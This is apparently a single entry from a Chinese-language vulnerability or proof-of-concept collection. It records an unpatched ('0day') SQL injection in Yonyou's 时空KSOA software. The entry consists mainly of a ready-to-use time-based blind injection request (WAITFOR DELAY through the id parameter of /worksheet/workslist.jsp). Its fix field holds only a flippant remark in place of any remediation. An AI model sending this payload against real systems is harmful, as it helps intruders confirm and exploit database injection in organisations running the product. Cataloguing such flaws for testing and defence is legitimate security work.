vendor = "用友"
name = "用友时空KSOA SQL注入"
type = "SQL注入"
version = "未知"
path = "/worksheet/workslist.jsp"
detail = "/worksheet/workslist.jsp?id=1';WAITFOR+DELAY+'0:0:3"
fix = "找电信要"
date = "0707"
label = "0day"
verifier = "匿名"
